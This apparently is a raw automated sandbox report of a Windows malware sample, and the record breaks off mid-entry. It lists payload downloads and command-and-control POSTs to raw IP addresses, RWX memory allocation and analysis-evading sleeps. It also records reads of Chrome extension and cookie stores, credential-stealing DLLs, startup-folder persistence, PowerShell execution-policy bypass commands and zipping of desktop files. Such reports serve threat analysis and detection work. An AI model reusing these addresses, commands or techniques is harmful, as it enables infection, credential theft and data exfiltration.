request GET http://185.125.50.8/mVsXkjvb3/Plugins/clip64.dll
request GET http://176.113.115.7/files/8032894631/9hUDDVk.exe
request GET http://176.113.115.7/files/5153162918/pwHxMTy.exe
request GET http://176.113.115.7/files/6491397189/T0QdO0l.exe
request GET http://176.113.115.7/files/7853925217/ogfNbjS.ps1
request GET http://185.215.113.16/test/amnew.exe
request GET http://176.113.115.7/files/5526411762/yUI6F6C.exe
request POST http://185.215.113.209/Di0Her478/index.php
request GET http://176.113.115.7/files/5526411762/CgmaT61.exe
request GET http://176.113.115.7/files/2043702969/9zQZD2e.exe
request GET http://176.113.115.7/files/6691015685/V0Bt74c.exe
request POST http://45.93.20.28/85a1cacf11314eb8.php
request POST http://176.113.115.6/Ni9kiput/index.php
request POST http://185.125.50.8/mVsXkjvb3/index.php
request POST http://185.215.113.209/Di0Her478/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 724
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 724
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7793f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x778b0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x756e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 188416
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00211000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04060000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04070000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04080000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04390000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04500000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04510000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04620000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04730000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04750000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04760000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04770000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04780000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04790000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x048e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x048f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04910000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x043a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73dc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d91000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d21000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x051a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006840000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2356
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7793f000
process_handle: 0xffffffff
1 0 0
description Gxtuum.exe tried to sleep 182 seconds, actually delayed analysis time by 182 seconds
description rapes.exe tried to sleep 1181 seconds, actually delayed analysis time by 1181 seconds
description 3H65J.exe tried to sleep 178 seconds, actually delayed analysis time by 178 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 2423665
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2423665
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2422313
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2422313
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\djclckkglechooblngghdinmeemkbgci\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\apenkfbbpmhihehmihndmmcdanacolnh\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings\ciojocpkclfflombbcfigcijjcbkmhaf\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opfgelmcmbiajamepnmloijbpoleiama\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sv\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\fiikommddbeccaoicoejoniammnalkfa\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOCK\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8620.824.0.0_0\_locales\fa\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\MANIFEST-000001\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\naepdomgkenhinolocfifgehidddafch\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\omaabbefbmiijedngplfjmnooppbclkk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch\CURRENT
file C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\1N22O8.exe
file C:\Users\test22\AppData\Roaming\TypeName.exe
file C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe
file C:\Users\test22\AppData\Local\Temp\10115790101\T0QdO0l.exe
file C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe
file C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1
file C:\ProgramData\mozglue.dll
file C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\clip64.dll
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\3H65J.exe
file C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe
file C:\ProgramData\vcruntime140.dll
file C:\Users\test22\AppData\Local\Temp\go.pub.bat
file C:\Users\test22\AppData\Local\Temp\10125900101\9zQZD2e.exe
file C:\Users\test22\AppData\Local\Temp\353090\Seat.com
file C:\Users\test22\AppData\Local\Temp\10121660101\amnew.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\67cb736da8518.vbs
file C:\ProgramData\msvcp140.dll
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs
file C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe
file C:\Users\test22\AppData\Local\Temp\10075800101\zY9sqWs.exe
file C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2q1116.exe
file C:\ProgramData\freebl3.dll
file C:\ProgramData\softokn3.dll
file C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe
file C:\Users\test22\AppData\Local\Temp\10124820101\yUI6F6C.exe
file C:\ProgramData\nss3.dll
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\J5j65.exe
file C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\cred64.dll
file C:\Users\test22\AppData\Local\Temp\10119590141\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline Powershell.exe -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1"
cmdline cmd.exe /c 67cb736da8518.vbs
cmdline C:\Windows\System32\cmd.exe /c expand Go.pub Go.pub.bat & Go.pub.bat
cmdline powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal
cmdline "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1"
file C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe
file C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe
file C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe
file C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe
file C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe
file C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe
file C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe
file C:\Users\test22\AppData\Local\Temp\10125900101\9zQZD2e.exe
file C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe
file C:\Users\test22\AppData\Local\Temp\845cfbab99\Gxtuum.exe
file C:\Users\test22\AppData\Local\Temp\353090\Seat.com
file C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\67cb736da8518.vbs
file C:\Users\test22\AppData\Local\Temp\845cfbab99\Gxtuum.exe
file C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe
file C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe
file C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\clip64.dll
file C:\Users\test22\AppData\Local\Temp\353090\Seat.com
file C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe
file C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe
file C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe
file C:\Users\test22\AppData\Roaming\TypeName.exe
file C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe
file C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe
file C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10075800101\zY9sqWs.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10075800101\zY9sqWs.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe
1 1 0

ShellExecuteExW

show_type: 0
